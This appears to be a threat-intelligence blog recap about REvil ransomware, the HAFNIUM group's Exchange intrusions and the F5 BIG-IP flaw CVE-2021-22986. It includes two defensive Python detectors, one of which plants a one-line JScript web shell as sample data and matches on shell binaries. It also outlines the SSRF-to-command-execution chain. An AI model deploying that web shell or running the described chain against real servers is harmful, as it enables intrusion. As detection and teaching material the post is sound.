Sodinokibi, HAFNIUM, and CVE-2021-22986 – KNOW What Happened This Week

Post by rajarshi Mar 25, 2021

Welcome to our weekly recap! KNOW, Netenrich’s threat intel platform and cybersecurity news aggregator, has identified Sodinokibi, HAFNIUM, and CVE-2021-22986 as this week’s most trending malware, threat actor, and vulnerability.

Sodinokibi – Malware Of The Week

Sodinokibi, also known as ‘REvil’, is ransomware distributed under a ransomware-as-a-service (RaaS) model and first seen in April 2019. Its infection vectors include phishing campaigns and the exploitation of known vulnerabilities; in particular, the Oracle WebLogic deserialization flaw CVE-2019-2725 gave its operators the ability to run code on the target server with the privileges of the WebLogic process and drop the ransomware there, which then encrypts the victim’s files.

Sodinokibi appeared shortly after the retirement of the GandCrab ransomware, and researchers have noted several similarities between the two. It captured everyone’s attention in May 2019 when its operators exploited the then-zero-day Oracle WebLogic flaw to encrypt files on target systems. The attackers demanded a $2,500 ransom, doubling to $5,000 if the victim missed the initial deadline. Notably, Sodinokibi checks the system’s language settings and avoids infecting computers in Russia, Iran, and countries that were formerly part of the USSR.

Why is Sodinokibi Trending?

Taiwanese electronics and computer maker Acer was hit by the Sodinokibi (REvil) ransomware. The attackers accessed financial spreadsheets, bank balances, and bank communications, and reportedly gained their initial foothold through a Microsoft Exchange server vulnerability (more on this in a bit).

The ransomware gang announced the intrusion on its data leak site and demanded a $50 million ransom, the largest known ransom demand at the time. Regarding the incident, Acer said:

“Companies like us are constantly under attack, and we have reported recent abnormal situations observed to the relevant law enforcement and data protection authorities in multiple countries.”

Sodinokibi Trends From KNOW

  • Total references: 24,000
  • Last 60 days: 2,000
  • Previous 7 days: 1,000

Sodinokibi Context From KNOW

  • Related IPs: 3
  • Hashes: 329
  • Industries Targeted: Education, Healthcare, Telecommunications, Banking, Finance, and Food & Beverage
  • Vulnerabilities: CVE-2018-8453, CVE-2019-2725, CVE-2019-19781, and CVE-2019-11510.
  • Threat Actors: Carbanak and Gold Southfield.

HAFNIUM – Threat Actor Of The Week

HAFNIUM is a sophisticated threat actor that Microsoft assesses to be state-sponsored and operating out of China. Microsoft publicly named the group in March 2021. It is notable for targeting US entities across several sectors for data exfiltration, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. HAFNIUM primarily targets on-premises Microsoft Exchange servers.

The group gains access to an Exchange server either with stolen credentials or by exploiting previously undisclosed vulnerabilities. It then plants a web shell so it can control the compromised server remotely. HAFNIUM operates from leased virtual private servers (VPS) in the US to run its intrusions and data exfiltration, and pushes the stolen data to the popular file-sharing site MEGA.
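The web shell is the artifact a defender can actually hunt for on a server that was exposed while vulnerable. The following scanner is an added example written for this post, not code from Microsoft or from the Exchange team: it walks an ASP.NET web root, keeps only server-side script files (optionally just those modified after a given time, such as the patch date), and flags files whose contents evaluate request data or spawn a process. The file extensions, the signature patterns, the directory names and the sample files are all this example’s own assumptions, constructed so it runs offline.

```python
import re
import tempfile
from pathlib import Path

# File types that an ASP.NET front end (such as Exchange's OWA/ECP) executes.
# Assumption: this list is this example's own, not from the post.
WEB_EXTS = {".aspx", ".ashx", ".asmx"}

# Heuristic signatures for small web shells that evaluate request data or
# spawn a process. Assumption: chosen for this example; tune for your estate.
SUSPICIOUS = {
    "eval-of-request": re.compile(r'eval\s*\(\s*Request', re.I),
    "unsafe-eval": re.compile(
        r'Request\.(Item|Form|QueryString)\s*\[[^\]]*\]\s*,\s*"unsafe"', re.I),
    "process-start": re.compile(r'System\.Diagnostics\.Process', re.I),
    "shell-binary": re.compile(r'\b(cmd\.exe|powershell(\.exe)?)\b', re.I),
}


def scan_webroot(root, newer_than=None):
    """Return [(relative path, [signature names])] for script files under root
    that match any signature. If newer_than (a POSIX timestamp) is given, only
    files modified after it are inspected, e.g. everything written since the
    server was first exposed."""
    hits = []
    for p in sorted(Path(root).rglob("*")):
        if not p.is_file() or p.suffix.lower() not in WEB_EXTS:
            continue
        if newer_than is not None and p.stat().st_mtime < newer_than:
            continue
        text = p.read_text(encoding="utf-8", errors="replace")
        matched = [name for name, rx in SUSPICIOUS.items() if rx.search(text)]
        if matched:
            hits.append((p.relative_to(root).as_posix(), matched))
    return hits


def build_sample_webroot(root):
    """Constructed sample tree (not a real Exchange install): one legitimate
    page and one planted one-line JScript shell."""
    root = Path(root)
    (root / "owa" / "auth").mkdir(parents=True)
    (root / "owa" / "auth" / "logon.aspx").write_text(
        '<%@ Page Language="C#" %>\n<html><body>Sign in</body></html>\n')
    (root / "aspnet_client").mkdir()
    (root / "aspnet_client" / "help.aspx").write_text(
        '<%@ Page Language="Jscript"%>'
        '<%eval(Request.Item["cmd"],"unsafe");%>\n')


def demo():
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        build_sample_webroot(d)
        return scan_webroot(d)


if __name__ == "__main__":
    for path, sigs in demo():
        print(f"{path}: {', '.join(sigs)}")
```

Run it against the real web root with `newer_than` set to the time the server was last known clean; anything it flags should be preserved for forensics (timestamps, IIS logs for the path) rather than simply deleted, since the shell is the pivot to the rest of the intrusion.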

Why Is HAFNIUM Trending?

Reports emerged that HAFNIUM and four other hacking groups have been exploiting vulnerabilities in Microsoft Exchange, Microsoft’s business email server. HAFNIUM’s targets are the US entities described above: infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.

As Microsoft’s report on the group put it:

“HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.”

HAFNIUM References From KNOW

  • Total references: 2,000
  • Last 60 days: 2,000
  • Previous 7 days: 265

CVE-2021-22986 – Vulnerability Of The Week

CVE-2021-22986 hit the news when F5 Networks, a leading provider of enterprise networking gear, announced four critical remote code execution (RCE) vulnerabilities affecting most BIG-IP and BIG-IQ software versions.

These vulnerabilities include:

  • CVE-2021-22986
  • CVE-2021-22987
  • CVE-2021-22991
  • CVE-2021-22992

The most critical is CVE-2021-22986, a flaw in the iControl REST management interface that can be exploited for unauthenticated remote code execution. Two attack vectors have been reported against vulnerable servers:

  • The first is an attack chain that begins with a server-side request forgery (SSRF) against the REST interface to obtain an authenticated session token, and then uses that token for remote command execution.
  • The second is a remote command execution (RCE) request against the “mgmt/tm/util/bash” endpoint, which lets an authenticated user run a shell command passed in the ‘utilCmdArgs’ parameter. Combined with a token obtained in the first step, the two stages give unauthenticated RCE.
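The two stages leave a recognizable trace in the management interface’s access log: a token request followed, from the same client, by a request to the command-execution endpoint. The detector below is an added example for this post, not F5’s code or any published signature. It assumes the access log is in Apache combined format, that the token-issuing endpoint is /mgmt/shared/authn/login (the iControl REST login path, which the post does not mention), and uses constructed sample lines; only /mgmt/tm/util/bash and utilCmdArgs come from the text above.

```python
import re
from datetime import datetime, timedelta

# Apache-style combined log line: client, timestamp, request line, status.
# Assumption: the management-plane access log is in this format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# iControl REST endpoints. /mgmt/tm/util/bash is the one named in the post;
# the token-issuing login endpoint is assumed from F5's REST documentation.
LOGIN_PATH = "/mgmt/shared/authn/login"
BASH_PATH = "/mgmt/tm/util/bash"


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    return rec


def scan_access_log(lines, window=timedelta(minutes=5)):
    """Flag every request to the bash endpoint. Severity is raised to 'high'
    when the same client obtained a token (HTTP 200 on the login endpoint)
    within `window` beforehand, i.e. the two-stage chain described above."""
    findings = []
    last_login = {}  # client ip -> time of its most recent successful login
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts = rec["ip"], rec["ts"]
        if rec["path"] == LOGIN_PATH and rec["status"] == 200:
            last_login[ip] = ts
        elif rec["path"] == BASH_PATH:
            chained = ip in last_login and ts - last_login[ip] <= window
            if chained:
                reason = ("token issued then command executed within "
                          f"{int(window.total_seconds())}s")
            else:
                reason = "request to command-execution endpoint"
            findings.append({
                "ip": ip,
                "time": ts.isoformat(),
                "status": rec["status"],
                "severity": "high" if chained else "medium",
                "reason": reason,
            })
    return findings


# Constructed sample lines (not real traffic): 203.0.113.5 runs the chain,
# 198.51.100.7 is an ordinary GUI login, 192.0.2.9 hits the bash endpoint cold.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Mar/2021:10:12:33 +0000] '
    '"POST /mgmt/shared/authn/login HTTP/1.1" 200 512 "-" "python-requests/2.25.1"',
    '203.0.113.5 - - [18/Mar/2021:10:12:34 +0000] '
    '"POST /mgmt/tm/util/bash HTTP/1.1" 200 231 "-" "python-requests/2.25.1"',
    '198.51.100.7 - - [18/Mar/2021:10:13:01 +0000] '
    '"GET /tmui/login.jsp HTTP/1.1" 200 4032 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [18/Mar/2021:11:00:00 +0000] '
    '"POST /mgmt/tm/util/bash HTTP/1.1" 401 0 "-" "curl/7.64.1"',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

Legitimate automation (configuration tooling that drives iControl REST) produces the same login-then-command sequence, so allowlist its source addresses before alerting, and treat any hit from an address outside the management network as an incident: the management interface should not be reachable from the internet in the first place.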

What is KNOW?

KNOW is Netenrich’s threat intel platform. It extracts data from billions of data points and correlates it with relevant intel and expert analyst insights to help you follow, search, and act in a fraction of the time it takes today.

One of KNOW’s handiest tools is the trending threats dashboard, which gives you a bird’s eye view of the most trending malware, threat actors, methods, and vulnerabilities in the following time frames:

  • Last 7 days.
  • Last 60 days.

So, want to check out KNOW some more? Why don’t you sign up? It’s completely free.
